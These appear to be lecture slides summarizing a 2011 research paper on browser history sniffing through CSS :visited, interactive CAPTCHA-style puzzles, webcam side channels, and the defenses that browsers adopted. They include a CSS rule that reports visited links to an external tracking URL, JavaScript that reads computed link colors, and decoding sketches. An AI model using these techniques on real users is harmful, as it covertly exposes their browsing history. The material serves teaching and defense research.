I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history

Zachary Weinberg, Eric Y. Chen, Pavithra Ramesh Jayaraman, Collin Jackson
Carnegie Mellon University
IEEE Symposium on Security and Privacy, May 2011

Outline
• Introduction
• Automated Attacks
• Exp 1: Interactive Attacks
• Exp 2: Side-Channel Attacks
• Related Work
• Conclusion

Introduction
• History sniffing through CSS :visited
• Andrew Clover, 2002, http://seclists.org/bugtraq/2002/Feb/271
In HTML:
    <a id="link1" href="http://google.com/">Visit Google!</a>
In CSS:
    #link1:visited {
      color: red;
      background: url(http://140.115.53.28/track.php?url=google.com);
    }

Introduction
• L. David Baron (2010) defence: http://dbaron.org/mozilla/visited-privacy
• CSS has a selector :link that matches unvisited links, and a selector :visited that matches visited links. So typical styles for links might be expressed in the form:
    :link, :visited {
      /* for all links */
      text-decoration: underline;
    }
    :link {
      /* for unvisited links */
      color: blue;
    }
    :visited {
      /* for visited links */
      color: purple;
    }

Introduction
• Authors can then write script that uses the getComputedStyle method to determine which links have been visited:
    var links = document.links;
    for (var i = 0; i < links.length; ++i) {
      var link = links[i];
      /* exact strings to match actually need to be
         auto-detected using reference elements */
      if (getComputedStyle(link, "").color == "rgb(0, 0, 128)") {
        // we know link.href has not been visited
      } else {
        // we know link.href has been visited
      }
    }
• To avoid this: make getComputedStyle act as though all links are unvisited

Introduction
• Make certain CSS selectors act as though links are always unvisited
• Limit the CSS properties that can be used to style visited links to color, background-color, border-*-color, outline-color, column-rule-color, fill, and stroke
• The latest versions of Firefox, Chrome, Safari, and IE all adopt this defense
• Browsers remain vulnerable to interactive attacks, as will be shown later

Background
• NCSA Mosaic, one of the first graphical Web browsers, drew hyperlinks in blue if they referred to a page that had not yet been visited, and in purple otherwise
• Netscape Navigator inherited this feature
• Web evolution: early sites relied on server-side processing; later, JavaScript made it possible to run programs inside web pages
• This created a need for security
• Same-origin policy: the Web is partitioned by originating server, and a script can see only data from the HTTP server that produced it
• The policy was not applied to hyperlinks, since sites need to link to each other

Introduction
• Andrew Clover, in a BUGTRAQ post, first showed the browsing history leakage
• Jang et al., An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications
  • History sniffing found on 46 popular websites, including one from the Alexa Top 100
  • Real exploiters probed small sets of links (6 to 220)
• Such small link sets make interactive attacks possible

Introduction
• What can history sniffers do?
• Benign:
  • Websites (e.g. banks) could use history sniffing to determine whether their users have visited known phishing sites
  • Websites could seed visitors’ history with URLs made up for the purpose, and use those URLs to re-identify their visitors (cookies also provide this)
• Malicious:
  • Track visitors across sites for advertising purposes, or determine whether they also visit a site’s competitors (as with tracking cookies)
  • Attackers can construct more targeted phishing pages, by impersonating only sites that a particular victim is known to visit

Automated Attacks
How automated attacks worked, and how browsers now prevent them

Automated Attacks
• Direct sniffing: the attacker guesses URLs of pages that visitors may have visited, creates links pointing to those URLs, and determines whether each visitor has indeed visited them by inspecting the links’ computed styles
    <style>
      a:visited { color: red; }
    </style>
    var url_array = new Array('http://a.com', 'http://b.com');
    var visited_array = new Array();
    var link_el = document.createElement('a');
    // The computed style object is live, so it reflects each new href.
    var computed_style = document.defaultView.getComputedStyle(link_el, "");
    for (var i = 0; i < url_array.length; i++) {
      link_el.href = url_array[i];
      if (computed_style.getPropertyValue("color") == 'rgb(255, 0, 0)') {
        visited_array.push(url_array[i]);
      }
    }

Automated Attacks
• Indirect sniffing
  • Make visited and unvisited links take different amounts of space, which causes unrelated elements on the page to move; then inspect the positions of those other elements
  • Make visited and unvisited links cause different images to load, by using a background-image style in a :visited rule
  • The image variant does not require JavaScript

Automated Attacks
• Side-channel sniffing
• Timing attacks: the attacker can make the page take longer to lay out if a link is visited than if it is unvisited
• The time difference is measurable when the :visited rule:
  • makes the color transparent
  • underlines the link
  • contains any other style rules

Automated Attacks
• The authors discovered a side channel for history sniffing in early beta versions of Firefox 4 (which included Baron’s defense); it was reported to Mozilla and resolved in Beta 10
• Firefox looked up history database entries in the background and first drew the page as if all links were unvisited
• If any links turned out to be visited, the page was redrawn; changing a link target starts the process over
• Firefox 4 generates a MozAfterPaint event when a page is redrawn
• An attacker could add an event handler for MozAfterPaint and find out that there is a visited link
• Defense: Baron’s solution does well against all three types above (direct, indirect, side-channel)

Automated Attacks
• Baron’s defense in Firefox 4, Chrome 9, Safari 5, IE 9:
• Pretend that all links are unvisited (blocks direct sniffing)
• Visited links are always the same size and take the same amount of time to draw as their unvisited counterparts (blocks indirect and side-channel sniffing)
• Against timing attacks: a browser will do one history lookup per style rule, and it will do it last, after all the other work of selector matching
• A rule that needs more than one lookup, such as :visited + :visited { ... }, which is meant to apply to the second of two visited links in a row, will be ignored by a browser that implements the defense

Automated Attacks
• User study (307 participants)
• Demonstrates that history sniffing remains feasible via interactive techniques not covered by the defense
• Developed proofs of concept of six history-sniffing exploits that work with Baron’s defense in place:
  • Four require interaction with the user
  • Two detect the color of the screen with a webcam

Experiment 1: Interactive Attacks
• Require victims to interact with malicious sites
• The authors claim that interactive attacks can be disguised as “normal” interactive tasks that users will not find surprising or suspicious
• Recruited 307 participants through Amazon’s Mechanical Turk
• All tasks in this experiment operate within the constraints of Baron’s defense: visited-link styles only change colors on the screen
• The tasks pretend to be CAPTCHA tests
• CAPTCHA: Completely Automated Public Turing test to tell Computers and Humans Apart

Exp 1: Interactive Attacks
• Word CAPTCHA
• Each word is a hyperlink to a URL that the attacker wishes to probe
• If the URL is unvisited, the word is drawn in the same color as the background, so the user will not type it; the words the user does type reveal history
• Drawback: only a small number of URLs is revealed, because CAPTCHAs should be short
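The server-side inference for the word CAPTCHA can be sketched as follows. This is a minimal illustration, not the authors' code: the function name `decodeWordCaptcha`, the shape of `challenge`, and the example words and URLs are all assumptions made here.

```javascript
// Hypothetical helper: infer visited URLs from a word-CAPTCHA response.
// `challenge` pairs each displayed word with the URL it links to (assumed shape).
function decodeWordCaptcha(challenge, typedText) {
  // Normalise the response into a set of lower-case words.
  const typed = new Set(
    typedText.toLowerCase().split(/\s+/).filter((w) => w.length > 0)
  );
  const visited = [];
  const unvisited = [];
  for (const { word, url } of challenge) {
    // A word the victim could read (and therefore typed) was drawn in the
    // visited color; a word drawn in the background color stays untyped.
    (typed.has(word.toLowerCase()) ? visited : unvisited).push(url);
  }
  return { visited, unvisited };
}

// Example with made-up words and URLs.
const challenge = [
  { word: "river", url: "http://a.example/" },
  { word: "candle", url: "http://b.example/" },
  { word: "orbit", url: "http://c.example/" },
];
const result = decodeWordCaptcha(challenge, "river  Orbit");
console.log(result.visited);
```

Each word carries one bit, which is why this variant reveals few URLs per prompt.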

Exp 1: Interactive Attacks
• Character CAPTCHA
• Every character represents 3 URLs
• Clever choice of font symbols to test visitedness: a font that mimics seven-segment LCD symbols
• Each visible character is four characters superimposed, three of which are visible only if an associated link is visited
• Barriers:
  • The font is rarely found installed
  • Baron’s defence does not allow visited-link rules to change the transparency of a color (the attacker can make the color always nearly transparent, or use black for visited and white for unvisited)

Exp 1: Interactive Attacks
• If the links corresponding to 4 and 5 are visited, the user sees a 9: 4 + 5 = 9; 4 + F = A; 5 + F = 6; 4 + 5 + F = 8
• “–” is always on: if it were omitted, victims would see blanks and type only one space, confusing the positions of the following characters
• An eight-character CAPTCHA probes 24 sites; a 12-character one probes 36
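The glyph sums listed on the slide amount to a 3-bit code per character, which can be decoded with a small lookup table. The sketch below is illustrative only: the table follows the slide, while `decodeCharacterCaptcha`, the `positions` structure, the example URLs, and the use of an ASCII hyphen for the always-on bar are assumptions made here.

```javascript
// Mapping taken from the slide: the bar is always drawn; "4", "5" and "F"
// are each drawn only if their associated link is visited.
const COMPOSITE_TO_PARTS = {
  "-": [],
  "4": ["4"],
  "5": ["5"],
  "F": ["F"],
  "9": ["4", "5"],
  "A": ["4", "F"],
  "6": ["5", "F"],
  "8": ["4", "5", "F"],
};

// `positions` is a hypothetical list: for each CAPTCHA character, the URLs
// tied to its "4", "5" and "F" glyphs.
function decodeCharacterCaptcha(positions, typedText) {
  const visited = [];
  const chars = typedText.toUpperCase().split("");
  positions.forEach((urlsByGlyph, i) => {
    const parts = COMPOSITE_TO_PARTS[chars[i]];
    if (parts === undefined) return; // unreadable or missing character: no inference
    for (const glyph of parts) visited.push(urlsByGlyph[glyph]);
  });
  return visited;
}

// Example with made-up URLs: two characters probe six links.
const positions = [
  { "4": "http://a.example/", "5": "http://b.example/", "F": "http://c.example/" },
  { "4": "http://d.example/", "5": "http://e.example/", "F": "http://f.example/" },
];
const visitedFromNineDash = decodeCharacterCaptcha(positions, "9-");
const visitedFromA6 = decodeCharacterCaptcha(positions, "a6");
console.log(visitedFromNineDash, visitedFromA6);
```

Because each character carries three links, an eight-character response covers 24 URLs, matching the figure on the slide.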

Exp 1: Interactive Attacks
• Chessboard puzzle
• Each square is associated with a URL
• Only the pawns corresponding to visited sites are made visible
• The pawns are drawn using SVG or text (Unicode dingbats)
• Victims are asked to click on all the pawns, so each click marks a visited site
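Turning clicks into history is a direct lookup, since a victim can only click pawns that are visible. A minimal sketch, assuming a hypothetical `squareToUrl` map from square names to probed URLs (the names and URLs are made up for illustration):

```javascript
// Hypothetical board description: square name -> URL whose visited state
// controls whether a pawn is visible on that square.
function decodeChessboardClicks(squareToUrl, clickedSquares) {
  const visited = new Set();
  for (const square of clickedSquares) {
    const url = squareToUrl.get(square);
    if (url !== undefined) visited.add(url); // ignore clicks on unmapped squares
  }
  return [...visited];
}

// Example: the victim clicks two pawns and one empty square.
const squareToUrl = new Map([
  ["a2", "http://a.example/"],
  ["b2", "http://b.example/"],
  ["c2", "http://c.example/"],
]);
const visitedFromClicks = decodeChessboardClicks(squareToUrl, ["a2", "c2", "h8"]);
console.log(visitedFromClicks);
```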

Exp 1: Interactive Attacks
• Pattern matching puzzle
• Four SVG shapes, whose fill colors depend on the visitedness of four URLs
• The victim selects two images, each from four choices; together the selections reveal the visitedness of the four links
• Multiple puzzles could work…

Exp 1: Interactive Attacks
• The experiment did not sniff participants’ actual history
• Goal: just prove that the tasks can be done by a typical user accurately, quickly, and without frustration
• With real history, the authors would not have known the ratio of visited to unvisited links to expect for each prompt, nor would they have been able to detect errors
• Instead, task instances were randomly generated to correspond to known proportions of visited and unvisited links
• Each participant did a fixed number of trials per task
• Tasks that did not work with a participant’s browser were skipped

Exp 1: Interactive Attacks
• The authors also ran automated history-sniffing exploits on all the participants
• This test used a set of 7012 commonly visited URLs from wtikay.com (drawn from the Alexa Top 5000)
• Only the total elapsed time and the number of URLs detected as visited were recorded

Results
• Not all participants completed all tasks
• Usable data: more than 177 participants for each task
• Chessboard was first in accuracy, with almost all participants scoring close to 100%
• Word CAPTCHA was easier than character CAPTCHA
• Pattern matching did worse


Results
• On the next slide:
• Chessboard is the winner, with a median of ~1000 queries per minute. The rate reflects both:
  • how fast a victim can do the task
  • how many URLs the task encodes
• Character CAPTCHA is second because it encodes many URLs
• Participants were challenged to carry out dozens of instances
• No significant effect of fatigue (except for participants who refused to complete all the requested trials of the character CAPTCHA)
• “Hawthorne effect”: aware that their performance was being measured, participants performed better
• Motivation: payment depended on speed and accuracy

Exp 1: Interactive Attacks
[Figure: achievable history sniffing rate per task. Annotation: character CAPTCHA is second because it encodes many URLs.]

Exp 1: Interactive Attacks
• The percentage of links detected as visited is small, so attackers can assume a sparse set of visited links (Janc & Olejnik)
• But sparseness over this generic link set may not equate to sparseness over a more targeted set, and the link sets found by Jang were quite targeted indeed


Discussion
• How to defend? By further restricting the functionality of visited-link history: either the circumstances under which links are revealed to be visited, or the capabilities of visited-link styles
• Do not allow links to be drawn in the same color as the background
• Limit the cases in which visited links are revealed, e.g. a same-domain policy for revealing links
• But then how would users see visited links any more? Use a whitelist?

Discussion
• Even so, an attacker can work around a whitelist
• With SafeHistory: if attackers can predict the location of a link to a site of interest on a whitelisted page, they can draw pictures out of iframes, each showing one pixel of the whitelisted page directly above that link
• Alternative: use “private browsing” mode, which remembers history only until it is shut down

Exp 2: Side-channel Attacks
• Idea:
  • A backlit screen illuminates the user and the surrounding environment
  • The color of that light varies with what is on the screen
  • If the color of an area depends on link visitedness, a camera can detect it
• Two obstacles:
  • The user must give permission to use the camera
  • To probe many links, the page must change color frequently, which makes the screen flash (like <blink>), annoys users, and risks epileptic seizures

Exp 2: Side-channel Attacks
• Created 2 test variants
• A rectangular box of uniform color is the hyperlink; it changes periodically and is detected by the webcam
• Randomly generated 20 URLs, 10 of them visited
• Variant 1: designed to comply with the WCAG standard for seizure safety
• Variant 2: makes the entire browser window flash and uses brighter colors
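One plausible way to turn webcam frames into a visited/unvisited decision is to compare the average brightness seen during a probe with two calibration levels. The slides do not describe the authors' actual classifier, so everything below is an assumption for illustration: the nearest-baseline rule, the names `mean` and `classifyProbe`, and the sample numbers.

```javascript
// Mean of an array of numbers.
const mean = (xs) => xs.reduce((a, b) => a + b, 0) / xs.length;

// Assumed heuristic: a probe is "visited" if its average brightness is
// closer to the calibration level recorded for the visited color than to
// the level recorded for the unvisited color.
function classifyProbe(samples, visitedBaseline, unvisitedBaseline) {
  const level = mean(samples);
  return Math.abs(level - visitedBaseline) < Math.abs(level - unvisitedBaseline);
}

// Example with made-up brightness values on a 0-255 scale.
const brightProbe = classifyProbe([200, 210, 190], 205, 90);
const dimProbe = classifyProbe([95, 100, 85], 205, 90);
console.log(brightProbe, dimProbe);
```

A rule of this kind depends on stable ambient light, so a dark room or a moving subject would be expected to degrade it.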

Exp 2: Side-channel Attacks
• Author test
  • Tested on the authors’ computers (a MacBook Pro with built-in webcam) in three settings with diverse backgrounds: an office cubicle, a bedroom, and a living room
  • 100% accuracy for both variants in all conditions, given a well-lit room and a person staying still in front of the computer
  • In a dark room, accuracy dropped to 50%
• Field test
  • 60 of the 307 participants performed the webcam test

Exp 2: Side-channel Attacks
• Accuracy rate is highly variable in the field
• High error rate: participants moved around during the task
• Most serious obstacle: persuading victims to allow access to their webcams

Privacy attacks other than on visited-link history
• Page cache:
  • Browsers cache resources retrieved from the Web
  • The time a page load takes reveals whether a resource is already in the browser’s cache, and so whether the user has visited the page
  • Felten et al., Timing Attacks on Web Privacy
• DNS cache:
  • Maps names to IP addresses
  • Attackers can induce the browser to do a DNS lookup and measure the time it takes
  • Can reveal which sites a user has visited and which search queries the user made
  • Felten et al., Timing Attacks on Web Privacy
• Both tactics above:
  • Work only the first time, since the probe itself fills the cache
  • Reveal only short-term history
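The cache-timing idea reduces to timing a load and comparing it with calibration timings. The sketch below assumes a midpoint threshold, which is a simplification chosen here rather than the method from the cited paper; `looksCached`, `timeLoad`, and the caller-supplied `load` function are hypothetical names.

```javascript
// Assumed heuristic: treat a load as a cache hit if it is faster than the
// midpoint between a known-cached and a known-uncached calibration timing.
function looksCached(loadMs, cachedBaselineMs, uncachedBaselineMs) {
  const threshold = (cachedBaselineMs + uncachedBaselineMs) / 2;
  return loadMs < threshold;
}

// Time an arbitrary async loader. `load` is supplied by the caller (for
// example a function that fetches a resource) and is hypothetical here.
async function timeLoad(load) {
  const start = performance.now();
  await load();
  return performance.now() - start;
}

// Example with made-up timings in milliseconds.
const fastLoad = looksCached(3, 2, 80);
const slowLoad = looksCached(70, 2, 80);
console.log(fastLoad, slowLoad);
```

Note that the act of timing a load also caches the resource, which is why a given probe is informative only once.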

Conclusion
• Automated history sniffing attacks have been successfully blocked by Baron’s solution
• Interactive attacks have not
• This paper developed proofs of concept of six history-sniffing exploits that work against Baron’s defense:
  • 4 interactive attacks
  • 2 that detect the screen color through a webcam
